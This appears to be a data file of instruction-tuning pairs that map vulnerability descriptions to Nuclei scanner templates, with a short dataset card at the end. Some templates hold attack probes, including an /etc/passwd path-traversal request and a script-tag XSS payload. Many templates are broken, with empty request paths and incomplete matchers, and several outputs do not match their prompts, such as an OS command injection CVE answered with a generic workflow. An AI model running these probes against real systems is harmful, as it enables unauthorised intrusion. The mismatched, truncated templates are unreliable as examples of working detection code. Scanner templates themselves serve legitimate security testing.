Title: Vulnerability (CWE-269) in CVE-2025-6934 Summary: The Opal Estate Pro – Property Management and Submission plugin for WordPress, used by the FullHouse - Real Estate Responsive WordPress Theme, is vulnerable to privilege escalation via in all versions up to, and including, 1.7.5. This is due to a lack of role restriction during registration in the 'on_regiser_user' function. This makes it possible for unauthenticated attackers to arbitrarily choose the role, including the Administrator role, assigned when registering. Vulnerability Type: Vulnerability (CWE-269) Severity: critical Indicators: error, vulnerability detected
id: CVE-2025-6934 info: name: The Opal Estate Pro – Property Management <= 1.7.5 - Unauthenticated Privilege Escalation author: pussycat0x severity: critical description: The Opal Estate Pro plugin (≤ 1.7.5) is vulnerable to privilege escalation. Due to missing role restrictions in the on_register_user function, users can register with any role. This allows unauthenticated attackers to create administrator accounts. tags: cve,cve2025,wordpress,wp-plugin,wp,intrusive,plugin,opalestate,vuln http: - method: GET path: matchers: - type: word words: - "opalestate-register-nonce" part: body - method: GET path: matchers: - type: dsl condition: and
cve
critical
CVE-2025-6934
Generate a Nuclei template for: LiteSpeed Cache Detection
Title: LiteSpeed Cache Detection Summary: LiteSpeed Cache Detection. Tags: tech, wordpress, wp-plugin Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: wordpress-litespeed-cache info: name: LiteSpeed Cache Detection author: ricardomaia severity: info description: LiteSpeed Cache Detection tags: tech,wordpress,wp-plugin,top-100,top-200,discovery http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" matchers: - type: dsl - type: regex part: body
generic
info
wordpress-litespeed-cache
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: bittube info: name: Bittube User Name Information - Detect author: dwisiswant0 severity: info description: Bittube user name information check was conducted. tags: osint,osint-video,bittube,discovery http: - method: GET path: - "https://bittube.video/c/{{user}}/videos" matchers: - type: status status: - 200 - type: word words: - "- BitTube</title>" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: CSZ CMS 1.3.0 - SQL Injection
Title: CSZ CMS 1.3.0 - SQL Injection Summary: CSZ CMS 1.3.0 - SQL Injection. CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: csz-cms-sqli info: name: CSZ CMS 1.3.0 - SQL Injection author: r3Y3r53 severity: high description: CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities. tags: time-based-sqli,packetstorm,sqli,csz,cms,vuln http: - method: GET path: matchers: - type: dsl condition: and
generic
high
csz-cms-sqli
Generate a Nuclei template for CVE-2022-29455
Title: Cross-Site Scripting (XSS) in elementor website_builder Summary: DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions. Vulnerability Type: Cross-Site Scripting (XSS) Severity: medium Affected Products: elementor website_builder Indicators: error, vulnerability detected
id: CVE-2022-29455 info: name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting author: rotembar,daffainfo severity: medium description: WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. tags: cve,cve2022,xss,wordpress,elementor,passive,vuln http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" matchers: - type: dsl - type: word words: - "Elementor Website Builder" part: body - type: status status: - 200
cve
medium
CVE-2022-29455
Generate a Nuclei template for: Vista Web Login Panel
Title: Vista Web Login Panel Summary: Vista Web Login Panel. Vista Web login panel was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: vistaweb-panel info: name: Vista Web Login Panel author: righettod severity: info description: Vista Web login panel was detected. tags: panel,vistaweb,login,discovery http: - method: GET path: - "{{BaseURL}}/account/login" matchers: - type: dsl condition: and
generic
info
vistaweb-panel
Generate a Nuclei template for: Hugo Detect
Title: Hugo Detect Summary: Hugo Detect. Hugo is a fast and modern static site generator written in Go Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: hugo-detect info: name: Hugo Detect author: daffainfo severity: info description: Hugo is a fast and modern static site generator written in Go tags: tech,hugo,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<meta name=generator content="Hugo" part: body - type: status status: - 200
generic
info
hugo-detect
Generate a Nuclei template to detect SQL Injection
Title: SQL Injection (CWE-89) Summary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. Vulnerability Type: SQL Injection Severity: critical Indicators: vulnerability detected, error
id: xdcms-sqli info: name: XdCMS - SQL Injection author: pikpikcu severity: critical description: XdCMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. tags: sqli,xdcms,vuln http: - method: POST path: - "{{BaseURL}}/index.php?m=member&f=login_save" matchers: - type: word words: - "Content-Type: text/html" part: header - type: word words: - "{{md5({{num}})}}" part: body - type: status status: - 200
cwe
critical
CWE-89
Generate a Nuclei template for CVE-2021-20837
Title: OS Command Injection in sixapart movable_type Summary: Movable Type 7 r.5002 and earlier (Movable Type 7 Series), Movable Type 6.8.2 and earlier (Movable Type 6 Series), Movable Type Advanced 7 r.5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8.2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. Note that all versions of Movable Type 4.0 or later including unsupported (End-of-Life, EOL) versions are also affected by this vulnerability. Vulnerability Type: OS Command Injection Severity: critical Affected Products: sixapart movable_type Indicators: error, vulnerability detected
id: movable-workflow info: name: Movable Type Security Checks author: dhiyaneshDk severity: info description: A simple workflow that runs all Movable related nuclei templates on a given target. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
cve
critical
CVE-2021-20837
Generate a Nuclei template for: Zabbix Security Checks
Title: Zabbix Security Checks Summary: Zabbix Security Checks. A simple workflow that runs all Zabbix related nuclei templates on a given target. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: zabbix-workflow info: name: Zabbix Security Checks author: daffainfo severity: info description: A simple workflow that runs all Zabbix related nuclei templates on a given target. tags: unknown http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
zabbix-workflow
Generate a Nuclei template for CVE-2025-64095
Title: Unrestricted File Upload in dnnsoftware dotnetnuke Summary: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, the default HTML editor provider allows unauthenticated file uploads and images can overwrite existing files. An unauthenticated user can upload and replace existing files allowing defacing a website and combined with other issue, injection XSS payloads. This vulnerability is fixed in 10.1.1. Vulnerability Type: Unrestricted File Upload Severity: critical Affected Products: dnnsoftware dotnetnuke Indicators: error, vulnerability detected
id: CVE-2025-64095 info: name: DNN - Unrestricted Arbitrary File Upload author: DhiyaneshDk,pussycat0x severity: critical description: DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication. tags: cve,cve2025,intrusive,file-upload,dnn http: - method: GET path: matchers: - type: word words: - "{"group"" - "delete_type" part: body condition: and - type: word words: - "text/plain" part: content_type - type: status status: - 200
cve
critical
CVE-2025-64095
Generate a Nuclei template for: Apache ActiveMQ Detection
Title: Apache ActiveMQ Detection Summary: Apache ActiveMQ Detection. Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: apache-activemq-detect info: name: Apache ActiveMQ Detection author: pussycat0x severity: info description: Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server. tags: network,activemq,oss,detect,apache,detection,tcp,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
apache-activemq-detect
Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor
Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200) Summary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: private, personal information, such as p Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor Severity: medium Indicators: error, unauthorized
id: farkascity info: name: Farkascity User Name Information - Detect author: dwisiswant0 severity: info description: Farkascity user name information check was conducted. tags: osint,osint-blog,farkascity,discovery http: - method: GET path: - "https://farkascity.org/{{user}}/" matchers: - type: status status: - 200 - type: word words: - "blog-title" part: body
cwe
medium
CWE-200
Generate a Nuclei template for: ThingsBoard Access Token
Title: ThingsBoard Access Token Summary: ThingsBoard Access Token. Tags: thingsboard, exposure, tokens Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: thingsboard-access-token info: name: ThingsBoard Access Token author: DhiyaneshDK severity: info description: ThingsBoard Access Token tags: thingsboard,exposure,tokens,vuln http: - method: GET path: - "{{BaseURL}}" matchers: - type: status status: - 200
generic
info
thingsboard-access-token
Generate a Nuclei template for CVE-2018-7600
Title: Vulnerability (CWE-20) in drupal drupal and others Summary: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. Vulnerability Type: Vulnerability (CWE-20) Severity: critical Affected Products: drupal drupal, debian debian_linux Indicators: error, vulnerability detected
id: CVE-2018-7600 info: name: Drupal - Remote Code Execution author: pikpikcu severity: critical description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive,vkev,vuln http: - method: GET path: matchers: - type: word words: - "application/json" part: header - type: regex part: body - type: status status: - 200
cve
critical
CVE-2018-7600
Generate a Nuclei template to detect Insufficiently Protected Credentials
Title: Insufficiently Protected Credentials (CWE-522) Summary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. Vulnerability Type: Insufficiently Protected Credentials Severity: medium Indicators: unauthorized
id: jboss-jbpm-default-login info: name: JBoss jBPM Administration Console Default Login - Detect author: DhiyaneshDk severity: high description: JBoss jBPM Administration Console default login information was detected. tags: jboss,jbpm,default-login,vuln http: - method: GET path: matchers: - type: word words: - "JBoss jBPM Administration Console" part: body_1 - type: word words: - "</span>Tasks" part: body_3 - type: status status: - 200
cwe
medium
CWE-522
Generate a Nuclei template for CVE-2007-2449
Title: Unknown Vulnerability in apache tomcat Summary: Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ';' character, as demonstrated by a URI containing a "snp/snoop.jsp;" sequence. Vulnerability Type: Unknown Vulnerability Severity: medium Affected Products: apache tomcat Indicators: error, vulnerability detected
id: CVE-2007-2449 info: name: Apache Tomcat 4.x-7.x - Cross-Site Scripting author: pdteam,ritikchaddha severity: medium description: Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. tags: cve,cve2007,apache,misconfig,tomcat,xss,vuln http: - method: GET path: - "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp" matchers: - type: word words: - "Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp" - "JSP Request Method" part: body condition: and - type: word words: - "text/html" part: content_type - type: status status: - 200
cve
medium
CVE-2007-2449
Generate a Nuclei template for CVE-2010-2680
Title: Path Traversal in harmistechnology com_jesectionfinder Summary: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. Vulnerability Type: Path Traversal Severity: medium Affected Products: harmistechnology com_jesectionfinder Indicators: error, vulnerability detected
id: CVE-2010-2680 info: name: Joomla! Component jesectionfinder - Local File Inclusion author: daffainfo severity: medium description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php. tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology,vuln http: - method: GET path: - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd" matchers: - type: regex - type: status status: - 200
cve
medium
CVE-2010-2680
Generate a Nuclei template for: Utility Services Administration - Detect
Title: Utility Services Administration - Detect Summary: Utility Services Administration - Detect. Tags: tech, avaya, aura Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: utility-service-detect info: name: Utility Services Administration - Detect author: DhiyaneshDK severity: info description: Utility Services Administration - Detect tags: tech,avaya,aura,discovery http: - method: GET path: - "{{BaseURL}}" matchers: - type: word words: - "<title>Utility Services Administration</title>" - ">Utility-Services" part: body condition: or - type: status status: - 200
generic
info
utility-service-detect
Generate a Nuclei template to detect Use of Hard-coded Credentials
Title: Use of Hard-coded Credentials (CWE-798) Summary: The product contains hard-coded credentials, such as a password or cryptographic key. There are two main variations: Inbound: the product contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. In this variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cann Vulnerability Type: Use of Hard-coded Credentials Severity: high Indicators: vulnerability detected, error
id: azkaban-default-login info: name: Azkaban Web Client Default Credential author: pussycat0x severity: high description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered. tags: default-login,azkaban,vuln http: - method: GET path: matchers: - type: word words: - ""session.id"" - ""success"" condition: and - type: word words: - "azkaban.browser.session.id" - "application/json" part: header condition: and - type: status status: - 200
cwe
high
CWE-798
Generate a Nuclei template for: Fortinet FGFM protocol - Detect
Title: Fortinet FGFM protocol - Detect Summary: Fortinet FGFM protocol - Detect. FortiGate to FortiManager Protocol (FGFM) was detected. Vulnerability Type: Security Check Severity: info Indicators: vulnerability detected
id: fortinet-fgfm-detect info: name: Fortinet FGFM protocol - Detect author: johnk3r severity: info description: FortiGate to FortiManager Protocol (FGFM) was detected. tags: network,tcp,fortinet,fortigate,fortimanager,discovery http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
info
fortinet-fgfm-detect
Generate a Nuclei template for CVE-2012-6499
Title: Vulnerability (CWE-20) in age_verification_project age_verification Summary: Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. Vulnerability Type: Vulnerability (CWE-20) Severity: medium Affected Products: age_verification_project age_verification Indicators: error, vulnerability detected
id: CVE-2012-6499 info: name: WordPress Plugin Age Verification v0.4 - Open Redirect author: ctflearner severity: medium description: Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification,age_verification_project,vuln http: - method: GET path: matchers: - type: regex part: header
cve
medium
CVE-2012-6499
Generate a Nuclei template for: Unrestricted OpenSearch Access
Title: Unrestricted OpenSearch Access Summary: Unrestricted OpenSearch Access. Checks EC2 security groups for inbound rules allowing unrestricted access to OpenSearch on TCP port 9200. Restricts access to essential IP addresses only. Vulnerability Type: Security Check Severity: critical Indicators: vulnerability detected
id: ec2-unrestricted-opensearch info: name: Unrestricted OpenSearch Access author: princechaddha severity: critical description: Checks EC2 security groups for inbound rules allowing unrestricted access to OpenSearch on TCP port 9200. Restricts access to essential IP addresses only. tags: cloud,devops,aws,amazon,opensearch,aws-cloud-config http: - method: GET path: - "/" matchers: - type: status status: - 200
generic
critical
ec2-unrestricted-opensearch
Generate a Nuclei template for: Smarty - Server Side Template Injection
Title: Smarty - Server Side Template Injection Summary: Smarty - Server Side Template Injection. In PHP template engine Smarty, template injection is possible by exploiting the passthru function combined with array_map and chr. Vulnerability Type: Security Check Severity: high Indicators: vulnerability detected
id: smarty-ssti info: name: Smarty - Server Side Template Injection author: ritikchaddha severity: high description: In PHP template engine Smarty, template injection is possible by exploiting the passthru function combined with array_map and chr. tags: smarty,ssti,dast,vuln http: - method: GET path: matchers: - type: regex part: body
generic
high
smarty-ssti
End of preview. Expand in Data Studio
YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/datasets-cards)

Ernest Nuclei Templates Dataset v1 (Instruction Format)

This is a restructured version of the Ernest Nuclei Templates dataset optimized for instruction tuning.

Format

Each example has this structure:

{
  "instruction": "Generate a Nuclei template for CVE-2024-1234",
  "input": "Title: XSS in Product\nSummary: Description...\nSeverity: high",
  "output": "id: cve-2024-1234\n\ninfo:\n  name: ...\n\nhttp:\n  - method: GET\n    ...",
  "category": "cve",
  "severity": "high",
  "id": "CVE-2024-1234"
}

Usage

from datasets import load_dataset

dataset = load_dataset('json', data_files={
    'train': 'train.jsonl',
    'test': 'test.jsonl',
    'validation': 'validation.jsonl'
})

# For instruction tuning
example = dataset['train'][0]
print(f"Instruction: {example['instruction']}")
print(f"Input: {example['input']}")
print(f"Output: {example['output']}")

Advantages

  • Flatter structure: Easier to work with in ML frameworks
  • Instruction format: Ready for instruction-tuning (Alpaca, GPT-4 style)
  • Text-focused: Input and output are plain text strings
  • Smaller size: ~30% smaller than nested format
  • Faster loading: Less parsing overhead

Original Dataset

See the original nested format at: ../ernest-nuclei-templates-v1/

Downloads last month
29